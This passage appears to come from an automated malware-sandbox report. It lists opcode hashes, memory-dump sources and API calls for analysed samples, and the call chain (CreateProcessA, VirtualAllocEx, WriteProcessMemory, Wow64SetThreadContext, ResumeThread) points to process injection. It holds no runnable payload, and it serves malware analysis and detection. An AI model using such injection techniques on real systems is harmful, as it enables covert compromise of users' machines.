                                              • Instruction ID: ed36f0eaef0e726225996a913fc143ad0cf5f029c291728b586b3b1112644b58
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: D211DD75504280CFDB22CF58E5C4B15FFA2FB88314F24C6AAD8494B656C33AD40ACBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7992b782c0322fe168c30a8504103a9cc22b2e9fffbd1f8c4d6b14b702f138a
                                              • Instruction ID: 23f041f32e922c43d4c08b096ce19732a6ee656a39ab93b4f1aa78b63c40fff5
                                              • Opcode Fuzzy Hash: f7992b782c0322fe168c30a8504103a9cc22b2e9fffbd1f8c4d6b14b702f138a
                                              • Instruction Fuzzy Hash: 7BF02B73A041508BDB268BAC88D41ACBFA1EE5531571D00D6F846EBA51D231DB42C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8e419ad3862d4c3a967063004de20ac5ee4ed5d95a0ef6f66e0327658c57cd1
                                              • Instruction ID: 0841bbc38f1a17b6d2f617b0b59358e1e480ec0504f19e98355ebf596f36b904
                                              • Opcode Fuzzy Hash: d8e419ad3862d4c3a967063004de20ac5ee4ed5d95a0ef6f66e0327658c57cd1
                                              • Instruction Fuzzy Hash: B5F03739B40108CFDB14EB68D598B6D77B2EF88319F6040A8E50ACB3A4CB35AD02CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 837a7e00215834959184f1a107a83ec7221f02eb96473eed60384ab3bccb77b3
                                              • Instruction ID: 1bc60b092f4e831f130cbe27ac30062d2884ea469366d8b658b39cbd445b10c5
                                              • Opcode Fuzzy Hash: 837a7e00215834959184f1a107a83ec7221f02eb96473eed60384ab3bccb77b3
                                              • Instruction Fuzzy Hash: D5F0313094010AEFCF05EFB8F9449AD7BBAEF44304F509678C5089B258DF35AE0A8B81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9db68c57dce2ecc4a7e7fd66cc82bcca7e0bd13905fa45a0d70d42defefe6578
                                              • Instruction ID: d75c73f74147e78e181d1db040a143f977ee35371540044cee12fe44de016a28
                                              • Opcode Fuzzy Hash: 9db68c57dce2ecc4a7e7fd66cc82bcca7e0bd13905fa45a0d70d42defefe6578
                                              • Instruction Fuzzy Hash: D5C012363040504FD501972CE05447837B1DBCA1693240196D144CB332CE119802CB00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:12.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:215
                                              Total number of Limit Nodes:4
                                              execution_graph: [interactive graph rendering not reproduced as text; node listing truncated on the page]. API calls named on the graph's nodes: CreateActCtxA, ResumeThread, CreateProcessA, WriteProcessMemory, Wow64SetThreadContext.
6127580 WriteProcessMemory 18222->18224 18225 6127588 WriteProcessMemory 18222->18225 18223 6129945 18224->18223 18225->18223 18227 6129ed9 18226->18227 18229 6126ea0 ResumeThread 18227->18229 18230 6126f00 ResumeThread 18227->18230 18231 6126f08 ResumeThread 18227->18231 18228 6129f09 18228->18098 18229->18228 18230->18228 18231->18228 18238 61273f0 Wow64SetThreadContext 18232->18238 18239 61273e8 Wow64SetThreadContext 18232->18239 18240 61273ef Wow64SetThreadContext 18232->18240 18233 6129caf 18234 6129f09 18233->18234 18235 6126ea0 ResumeThread 18233->18235 18236 6126f00 ResumeThread 18233->18236 18237 6126f08 ResumeThread 18233->18237 18234->18098 18235->18234 18236->18234 18237->18234 18238->18233 18239->18233 18240->18233 18242 61298ef 18241->18242 18243 6129920 18242->18243 18244 6127810 CreateProcessA 18242->18244 18245 6127805 CreateProcessA 18242->18245 18243->18098 18243->18243 18244->18243 18245->18243 18247 61276c3 ReadProcessMemory 18246->18247 18249 6127707 18247->18249 18249->18167 18251 61276c3 ReadProcessMemory 18250->18251 18253 6127707 18251->18253 18253->18167 18255 6127899 18254->18255 18255->18255 18256 61279fe CreateProcessA 18255->18256 18257 6127a5b 18256->18257 18259 6127899 18258->18259 18259->18259 18260 61279fe CreateProcessA 18259->18260 18261 6127a5b 18260->18261 18263 6127435 Wow64SetThreadContext 18262->18263 18265 612747d 18263->18265 18265->18177 18267 61273ee Wow64SetThreadContext 18266->18267 18269 612747d 18267->18269 18269->18177 18271 6127435 Wow64SetThreadContext 18270->18271 18273 612747d 18271->18273 18273->18177 18275 6126f48 ResumeThread 18274->18275 18277 6126f79 18275->18277 18277->18178 18279 6126f48 ResumeThread 18278->18279 18281 6126f79 18279->18281 18281->18178 18283 61275d0 WriteProcessMemory 18282->18283 18285 6127627 18283->18285 18285->18192 18287 61275d0 WriteProcessMemory 18286->18287 18289 6127627 18287->18289 18289->18192 18291 61274c6 VirtualAllocEx 18290->18291 18293 6127545 18291->18293 18293->18202 
18295 6127508 VirtualAllocEx 18294->18295 18297 6127545 18295->18297 18297->18202 18299 6127508 VirtualAllocEx 18298->18299 18301 6127545 18299->18301 18301->18202 18302 612a6f8 18303 612a883 18302->18303 18304 612a71e 18302->18304 18304->18303 18306 6128bc8 18304->18306 18307 612a978 PostMessageW 18306->18307 18308 612a9e4 18307->18308 18308->18304 18316 612416e 18317 612417e 18316->18317 18319 6126b18 ResumeThread 18317->18319 18320 6126b08 ResumeThread 18317->18320 18318 6124573 18319->18318 18320->18318

                                              Control-flow Graph: function starting at 6127805; CreateProcessA called in block 612799f-6127a59 (graph rendering data omitted)
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06127A46
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 68050dd2e57a42cb9fe0664726e5b4ba6194fae171c1cf9b889ee0653bda6e71
                                              • Instruction ID: 7fa5d8883da96ee40f7a6b6de46419edb927408cf3f3b26839bef3b9c44aac72
                                              • Opcode Fuzzy Hash: 68050dd2e57a42cb9fe0664726e5b4ba6194fae171c1cf9b889ee0653bda6e71
                                              • Instruction Fuzzy Hash: AEA16B71D0022ACFDF54DF68C8517EEBBB2BF48314F1485AAD808A7290DB749995CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: function starting at 6127810; CreateProcessA called in block 612799f-6127a59 (graph rendering data omitted)
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06127A46
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 592962dae5ce38143f62c9b18be2f97e46bdd6e003c699670e7306f0a1380398
                                              • Instruction ID: 8b0aa27fc6ffa237879324606163fa42aaa9c4b85bcc503a395f611844792846
                                              • Opcode Fuzzy Hash: 592962dae5ce38143f62c9b18be2f97e46bdd6e003c699670e7306f0a1380398
                                              • Instruction Fuzzy Hash: 59915C71D0022ACFDF64DF68C841BDEBBB2BF44314F1485AAD808A7290DB759995CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: function starting at 1095cb4; CreateActCtxA called in block 1095cc4-1095d81 (graph rendering data omitted)
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 01095D71
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2046230708.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1090000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 6f19ecc660a9979dadfd96958090e6763f5f6887d680855a801b00b9595dbea6
                                              • Instruction ID: 7ccecdcf3419d5f7c16a5ecb7d36f3ffcbf886981a40c3d003b967d4d6c5980c
                                              • Opcode Fuzzy Hash: 6f19ecc660a9979dadfd96958090e6763f5f6887d680855a801b00b9595dbea6
                                              • Instruction Fuzzy Hash: 6A41F2B0C00619CFDB25DFAAC848BCDBBF1BF48304F20805AD418AB265DB75694ACF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: function starting at 1094608; CreateActCtxA called in block 1094608-1095d81 (graph rendering data omitted)
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 01095D71
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2046230708.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1090000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 3f30fab71da01d90961e7cc97d58561620342499fe3744d70dd3b854b487339f
                                              • Instruction ID: f54b0d29d628c7768b33b50fb79e94f5f297fad4dd8c4e9d1c6f9793edb18e01
                                              • Opcode Fuzzy Hash: 3f30fab71da01d90961e7cc97d58561620342499fe3744d70dd3b854b487339f
                                              • Instruction Fuzzy Hash: 3F41D2B0C0061DCBDB25DFAAC848B9DBBF5BF48704F20816AD408AB255D775694ACF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: function starting at 6126ea0; ResumeThread called in block 6126f13-6126f77 (graph rendering data omitted)
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 22591716be1c19b67d4212089e0a265b9d6ddf8867cc6fe08616b3ca09d4cf4b
                                              • Instruction ID: de4d510fdc5d4ff5aba88cbb1f41e0eb4625a3c6fc0dd8da738cf39ea215ab97
                                              • Opcode Fuzzy Hash: 22591716be1c19b67d4212089e0a265b9d6ddf8867cc6fe08616b3ca09d4cf4b
                                              • Instruction Fuzzy Hash: 00215774D0024A8FCB20DFA9C8447EEFBF1EF89314F2484AED559A7291CB399945CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: function starting at 6127580; WriteProcessMemory called in block 61275e6-6127625 (graph rendering data omitted)
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06127618
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: cf7ec199f9b34065573d350482dddad3397fe38ce882fa14ddb65a8839a9e45b
                                              • Instruction ID: 71ef58da1490fe6c51ab629fe0d5d260a9426563db3ebb71edf396dec811227e
                                              • Opcode Fuzzy Hash: cf7ec199f9b34065573d350482dddad3397fe38ce882fa14ddb65a8839a9e45b
                                              • Instruction Fuzzy Hash: 452157B59003599FCB10CFA9C985BEEBBF1FF48310F50882AE919A7250C7789555CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: function starting at 6127588; WriteProcessMemory called in block 61275e6-6127625 (graph rendering data omitted)
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06127618
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 5ff58b744b7ba7577a0744b6dc860a03c607af78769a2d8d8acbe64057e390d8
                                              • Instruction ID: ffe54b113f13fdc5f215954de802236e683ed9904090e55a18c408b421ea199a
                                              • Opcode Fuzzy Hash: 5ff58b744b7ba7577a0744b6dc860a03c607af78769a2d8d8acbe64057e390d8
                                              • Instruction Fuzzy Hash: 0F2169B1D003599FCB10CFA9C884BEEBBF5FF48310F108429E918A7240D7789950CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: function starting at 61273e8; Wow64SetThreadContext called in block 612744b-612747b (graph rendering data omitted)
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0612746E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 0145038fc1004414676127311255af7c63e079e3cf40f92286ccd01c0a338da0
                                              • Instruction ID: 5c1b1f42d744367add87ac535a68759dcf692a148e4bcfe49e629bbd8e5b6d30
                                              • Opcode Fuzzy Hash: 0145038fc1004414676127311255af7c63e079e3cf40f92286ccd01c0a338da0
                                              • Instruction Fuzzy Hash: B72137B5D002098FDB10DFA9C5857EEBBF4FF48324F50842AD459A7251C7789945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: function starting at 6127671; ReadProcessMemory called in block 6127671-6127705 (graph rendering data omitted)
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061276F8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: f5645848cb9f72a82f0d0e2ee0c371e819c06a63846616861d3902376fc65d25
                                              • Instruction ID: bd10a80a42b9c7af529edf5c3cf0bc4a835a74bc163cdbe891930fa032f44b81
                                              • Opcode Fuzzy Hash: f5645848cb9f72a82f0d0e2ee0c371e819c06a63846616861d3902376fc65d25
                                              • Instruction Fuzzy Hash: F12145B5C002598FCB10DFAAC981AEEBBF5FF48310F60842AE519A7250C7389551CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: function starting at 6127678; ReadProcessMemory called in block 6127678-6127705 (graph rendering data omitted)
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061276F8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 1f5eb617a75427d832252fb13fef6b5c540e739d46bf517a52be913d25d72916
                                              • Instruction ID: b332e4da8d74109679e1b0aca797c7bff8625964c918a6d88debb18c88f6036a
                                              • Opcode Fuzzy Hash: 1f5eb617a75427d832252fb13fef6b5c540e739d46bf517a52be913d25d72916
                                              • Instruction Fuzzy Hash: FD2137B1C003599FDB10DFAAC884AEEFBF5FF48310F50842AE519A7250C7789950CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph: function starting at 61273f0; Wow64SetThreadContext called in block 612744b-612747b (graph rendering data omitted)
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0612746E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 13ff4de37fda01954cedd5b281cacc330e1524e155b4a8c2740fa0c942c6c3ee
                                              • Instruction ID: cf71ca511aa8b86ae8637b304103e22bce7c3c8e9787a9a7c720f94245ab6f87
                                              • Opcode Fuzzy Hash: 13ff4de37fda01954cedd5b281cacc330e1524e155b4a8c2740fa0c942c6c3ee
                                              • Instruction Fuzzy Hash: 192115B1D002098FDB10DFAAC4857EEBBF4EF88324F54842AD559A7251CB78A945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0612746E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: fbc95d06ffca3319a89175f50821ef8c2a06c53b571849aac6fb3ffa9a551aac
                                              • Instruction ID: b81a7f57e0969937733b8063a346d2f719ebd1e73efbc693f27ce4190f6630b6
                                              • Opcode Fuzzy Hash: fbc95d06ffca3319a89175f50821ef8c2a06c53b571849aac6fb3ffa9a551aac
                                              • Instruction Fuzzy Hash: 1C2147B5D002098FDB10DFAAC5857EEBBF4EF48314F14842AD419A7240CB789945CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06127536
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 988aa2431035ac45cce206092939a3fbd984a6b502c0ba1dbe3cd4160086f9ec
                                              • Instruction ID: c669924ba3f5e258c37e7d4eac564cd69f888c6e14f1cf2c515d90c1fec6bdef
                                              • Opcode Fuzzy Hash: 988aa2431035ac45cce206092939a3fbd984a6b502c0ba1dbe3cd4160086f9ec
                                              • Instruction Fuzzy Hash: ED1156768002098FCB10DFA9C845AEFBFF5FF88320F20881AE519A7250C739A551CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06127536
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 498144d37d2e03bc12517bad840886ea7c3c96da668208291adf250e61264488
                                              • Instruction ID: 8b141a83ddf82aaec766aee086ec79468e89983891413436478a8addc6e1534c
                                              • Opcode Fuzzy Hash: 498144d37d2e03bc12517bad840886ea7c3c96da668208291adf250e61264488
                                              • Instruction Fuzzy Hash: 9F1137719002499FCB10DFAAC845AEFFFF5EF88320F208419E519A7250C779A550CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06127536
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 8d035ebbaae017c08945a0f8356718f93ba3aca620c59a3662986a8be62ca2a5
                                              • Instruction ID: 92395eb14bee2c0a3b855eccf8aa52b58be3995b7a2000c754684ab85dbddcb5
                                              • Opcode Fuzzy Hash: 8d035ebbaae017c08945a0f8356718f93ba3aca620c59a3662986a8be62ca2a5
                                              • Instruction Fuzzy Hash: 191137B69002099FCB10DFA9C9457EEFBF5EF48310F248419D519A7250C7799550CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 6422ecb97b78854acc5b1703562be1fd67e181ddf47effcda62f18be69c057e6
                                              • Instruction ID: c6e46fb557fa62119653ba89376e504c7f39b56744c01f4456f8fdbb795abe33
                                              • Opcode Fuzzy Hash: 6422ecb97b78854acc5b1703562be1fd67e181ddf47effcda62f18be69c057e6
                                              • Instruction Fuzzy Hash: 791146B1D002098FCB10DFA9C4457EEFBF5EF48314F20842AC459A7240CB39A944CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 32de444d7fc096a19c313ba818405a7d525371804d8616e9cef6050f4ce8d285
                                              • Instruction ID: e32246644eeef43c7ce53951bc42bf5ebfa57fc5f45e3ea36f4902528fd53140
                                              • Opcode Fuzzy Hash: 32de444d7fc096a19c313ba818405a7d525371804d8616e9cef6050f4ce8d285
                                              • Instruction Fuzzy Hash: 8F1128B1D002498FCB10DFAAC4457AFFBF5EF88324F208419D519A7250CB79A944CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0612A9D5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 42a13d18f0fc9ab6d2578ee74a62170e3b53d548bfc3df7e6838263f66f42356
                                              • Instruction ID: 0cfd533dda55c7051aa5e5ff9a80ed1f29387f6f1cc830e371453228d552681f
                                              • Opcode Fuzzy Hash: 42a13d18f0fc9ab6d2578ee74a62170e3b53d548bfc3df7e6838263f66f42356
                                              • Instruction Fuzzy Hash: 8B11F2B58003499FDB10DF9AC945BEEBBF8EB48324F10845AE518A7210C379A994CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0612A9D5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2054681580.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_6120000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: ef0793def058aec759638b4b5a8b78d69a28f5251e2b6f26954e8f97e2ea5b33
                                              • Instruction ID: 7e8b10049a8f34b921c5c390b687259c46994c53f3dcc71977311f7e4d18a903
                                              • Opcode Fuzzy Hash: ef0793def058aec759638b4b5a8b78d69a28f5251e2b6f26954e8f97e2ea5b33
                                              • Instruction Fuzzy Hash: 8E1103B5800359CFCB20DF9AC585BDEBBF8FB48310F10845AD558A7251C379A594CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045134352.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_103d000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e145eab74a1fb0aba45909a8d6aef156210e538c65ddc0c7fd9a5435ee1a5398
                                              • Instruction ID: 69d70fa31fc68de6b09bf3239f64cd2c96af9653d0c0a635e187bbb9f68a8327
                                              • Opcode Fuzzy Hash: e145eab74a1fb0aba45909a8d6aef156210e538c65ddc0c7fd9a5435ee1a5398
                                              • Instruction Fuzzy Hash: 3131AD7554C3809FD703DF64D994755BFB5AF86214F1885EAD8898B2A3C33A880ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045042905.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_102d000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 455119949ff129436c838f0899c4d5dbd06f90af54b972bde457e7219790ff3c
                                              • Instruction ID: 471c8e8365d32f0d466122954d6c84b23cc51184a062a550604d4e98bda170f0
                                              • Opcode Fuzzy Hash: 455119949ff129436c838f0899c4d5dbd06f90af54b972bde457e7219790ff3c
                                              • Instruction Fuzzy Hash: C6213371504240DFCB25DF98D9C4F2ABFA5FB88310F20C5A9E94D0B256C33AD816CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045134352.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_103d000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d26cebe0ea97eee3264dbe8b5e1530df455b94187254a0b9acef50b87be0218a
                                              • Instruction ID: b991ef12998c4ed524f9199a0eb0dbf4206695d10ed315f9f1a0a0b5216e17ed
                                              • Opcode Fuzzy Hash: d26cebe0ea97eee3264dbe8b5e1530df455b94187254a0b9acef50b87be0218a
                                              • Instruction Fuzzy Hash: A02191755483809FD703CF64D990715BFB5FB86214F18C5DAD8858B2A3C33A981ADB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2045134352.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_103d000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 585450631962347cb96df88da6401f6597e5f661ef20c8ffcaf733fdb80483b8
                                              • Instruction ID: 5bc7c9ef045535043ce9e4adea59ce45fe21d4c6fc41da794a7ab5b661f0c07e
                                              • Opcode Fuzzy Hash: 585450631962347cb96df88da6401f6597e5f661ef20c8ffcaf733fdb80483b8
